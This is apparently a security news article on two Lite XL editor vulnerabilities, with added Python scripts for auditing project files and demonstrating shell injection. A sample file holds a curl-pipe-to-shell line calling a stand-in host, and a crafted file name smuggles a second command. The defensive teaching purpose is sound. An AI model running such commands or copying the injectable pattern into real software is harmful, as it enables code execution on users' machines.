The CERT Coordination Center (CERT/CC) has issued a vulnerability note covering two security flaws in Lite XL, a lightweight cross-platform text editor popular among developers for its Lua-based extensibility. The vulnerabilities, CVE-2025-12120 and CVE-2025-12121, can lead to arbitrary code execution on a developer's machine: the first when the user opens a malicious project directory, the second when the editor builds a shell command from unsanitized input.
The first vulnerability, CVE-2025-12120, stems from Lite XL’s automatic execution of .lite_project.lua files whenever a user opens a project directory. While these files are designed for project-specific configuration, they can contain arbitrary Lua code, giving threat actors a direct path to execute malicious scripts if a developer unknowingly opens a compromised repository.
This behavior could easily be abused in software supply-chain attacks, particularly through shared codebases, Git repositories, or collaborative projects.
“The .lite_project.lua file is intended for project-specific configuration but can contain executable Lua logic. This behavior could allow execution of untrusted Lua code if a user opens a malicious project, potentially leading to arbitrary code execution with the privileges of the Lite XL process,” CERT/CC noted.
This flaw is particularly dangerous for developers working with open-source or third-party code, as it requires no user interaction beyond opening a folder in the editor.
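Because the project file runs as soon as the directory is opened, the only point at which a developer can intervene is before opening the checkout. The script below is an added illustration, not code from CERT/CC or the Lite XL project: it walks a cloned tree, finds every .lite_project.lua, and reports Lua constructs that reach the operating system or load further code. The watch-list of identifiers, the comment-stripping heuristic and the two sample project files are all constructed for this example.

```python
"""Pre-open audit for Lite XL project files.

Added example, not Lite XL code. Lite XL executes .lite_project.lua when a
project directory is opened, so the file should be read before an untrusted
checkout is opened. This walks a tree, finds every .lite_project.lua and flags
Lua constructs that reach the OS or pull in more code. The watch-list below is
an assumption (what a reviewer would want to see), not a complete taint model.
"""
import os
import re
import tempfile

PROJECT_FILE = ".lite_project.lua"

# Assumed watch-list; group 1 of each pattern is the identifier that is reported.
SUSPICIOUS = [
    r"\b(os\.execute|os\.remove|os\.rename)\b",
    r"\b(io\.popen|io\.open)\b",
    r"\b(system\.exec|process\.start)\b",
    r"\b(dofile|loadfile|loadstring|load|require)\s*[\(\"'{]",
]
SUSPICIOUS_RE = [re.compile(p) for p in SUSPICIOUS]


def strip_comments(src: str) -> str:
    """Blank out Lua comments so commented-out code is not reported.

    Long comments are replaced by the same number of newlines to keep line
    numbers stable. A '--' inside a string literal is also treated as a comment;
    that is a limitation of this heuristic, which is not a Lua parser.
    """
    src = re.sub(r"--\[(=*)\[.*?\]\1\]",
                 lambda m: "\n" * m.group(0).count("\n"), src, flags=re.S)
    return re.sub(r"--[^\n]*", "", src)


def find_suspicious(src: str) -> list[tuple[int, str]]:
    """Return (line_number, identifier) for every watch-list hit in Lua source."""
    hits = []
    for lineno, line in enumerate(strip_comments(src).splitlines(), 1):
        for pattern in SUSPICIOUS_RE:
            for match in pattern.finditer(line):
                hits.append((lineno, match.group(1)))
    return hits


def audit_tree(root: str) -> dict[str, list[tuple[int, str]]]:
    """Map each .lite_project.lua below root (path relative to root) to its hits."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if PROJECT_FILE in files:
            path = os.path.join(dirpath, PROJECT_FILE)
            with open(path, encoding="utf-8", errors="replace") as fh:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                report[rel] = find_suspicious(fh.read())
    return report


# Constructed sample project files for a stand-alone run; not from any real repository.
BENIGN = (
    "config.indent_size = 2\n"
    "-- os.execute('x') inside a comment is not reported\n"
)
RISKY = (
    'local core = require "core"\n'
    "config.indent_size = 4\n"
    'os.execute("curl -s http://example.invalid/x | sh")\n'
)


def demo() -> dict[str, list[tuple[int, str]]]:
    """Write one benign and one risky project file into a temp tree and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        for sub, body in (("clean", BENIGN), ("untrusted", RISKY)):
            os.makedirs(os.path.join(tmp, sub))
            with open(os.path.join(tmp, sub, PROJECT_FILE), "w", encoding="utf-8") as fh:
                fh.write(body)
        return audit_tree(tmp)


if __name__ == "__main__":
    for path, hits in sorted(demo().items()):
        status = "REVIEW" if hits else "ok"
        print(f"{status:6} {path} {hits}")
```

Run it against a fresh clone before opening the directory in Lite XL, or wire it into a pre-open wrapper script. A hit does not prove the file is malicious (a `require` of a core module may be legitimate), but any project file that touches the OS deserves a read, and a file with no hits still deserves a glance since this is a pattern match, not a sandbox.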
The second vulnerability, CVE-2025-12121, involves improper sanitization in the system.exec function, which is used across multiple components of Lite XL, including core.lua, rootview.lua, and the treeview plugin.
“Lite XL versions 2.1.8 and prior contain a vulnerability in the system.exec function, which allowed arbitrary command execution through unsanitized shell command construction,” the note explained.
Because this function could be influenced by user-controlled input, attackers might exploit it to execute arbitrary shell commands with the same privileges as the editor process.
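The "unsanitized shell command construction" CERT/CC describes is a generic pattern: a command string is assembled by concatenating untrusted text and handed to a shell. The example below is added here and is not Lite XL's code or its fix; it reproduces the pattern in Python, with `echo` standing in for whatever utility the editor would launch, and puts it beside two hardened forms. The crafted file name is constructed for the demonstration, and the metacharacter list is the author's own review aid.

```python
"""Shell command construction: the vulnerable pattern next to two hardened forms.

Added example, not Lite XL code. The advisory says system.exec built shell
commands from unsanitized input; this reproduces that pattern in Python, with
`echo` standing in for whatever utility the editor would launch, so the effect
of a crafted file name is visible in captured output. Requires a POSIX /bin/sh.
"""
import shlex
import subprocess

# Constructed attacker-influenced value: a file name that carries a second command.
CRAFTED_NAME = "notes.txt; echo INJECTED"

# Characters that change meaning in an unquoted POSIX sh word (assumed review list).
SHELL_METACHARS = set(";&|`$(){}<>*?[]\\\"' \t\n#~")


def run_vulnerable(name: str) -> str:
    """Unsafe: concatenate into one string and hand it to the shell.

    Mirrors the pattern the advisory describes: the untrusted name is spliced
    into the command text without quoting, so ';' ends the first command and
    whatever follows runs as a second one.
    """
    cmd = "echo " + name
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_quoted(name: str) -> str:
    """Hardened form 1: still a shell string, but every untrusted word is quoted."""
    cmd = "echo " + shlex.quote(name)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_argv(name: str) -> str:
    """Hardened form 2 (preferred): pass an argument vector; no shell is involved."""
    return subprocess.run(["echo", name], capture_output=True, text=True).stdout


def shell_metachars(value: str) -> set[str]:
    """Characters in value that an unquoted shell word would interpret.

    A review check, not a sanitizer: stripping these is not a fix, quoting or
    avoiding the shell is.
    """
    return {c for c in value if c in SHELL_METACHARS}


if __name__ == "__main__":
    print("vulnerable:", repr(run_vulnerable(CRAFTED_NAME)))
    print("quoted:    ", repr(run_quoted(CRAFTED_NAME)))
    print("argv:      ", repr(run_argv(CRAFTED_NAME)))
    print("metachars: ", shell_metachars(CRAFTED_NAME))
```

The vulnerable variant prints two lines because the shell sees two commands; both hardened variants print the crafted name as a single literal argument. The Lua equivalent of the unsafe form is `os.execute("tool " .. path)`, and the fix in any language is the same: quote each untrusted word for the target shell, or better, use an API that takes an argument list so no shell parses the string. Note that an argument vector removes shell injection but not argument injection: a name beginning with `-` can still be read as an option by the launched program, so pass `--` before user data where the utility supports it.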
Both vulnerabilities end in arbitrary code execution, but neither is remotely exploitable on its own: the attacker has to get a crafted project in front of the victim, typically through a repository the developer clones, and the victim has to open it in Lite XL. In the case of CVE-2025-12120, opening the directory is enough to run whatever Lua the .lite_project.lua file contains. For CVE-2025-12121, the trigger is whichever editor or plugin operation builds a shell command from attacker-influenced input. In both cases the code runs with the privileges of the Lite XL process, so the impact is bounded by what the developer's own account can reach, which on a workstation usually includes credentials, signing keys and other checked-out repositories.
The vulnerabilities were responsibly disclosed by Dogus Demirkiran, who was credited by both the Lite XL maintainers and CERT/CC for identifying and reporting the issues.
According to CERT/CC, both vulnerabilities affect Lite XL 2.1.8 and earlier. Users should upgrade to the latest release, which carries the fixes from pull requests #1472 and #1473 in the project's GitHub repository, and until they do should not open untrusted project directories in the editor.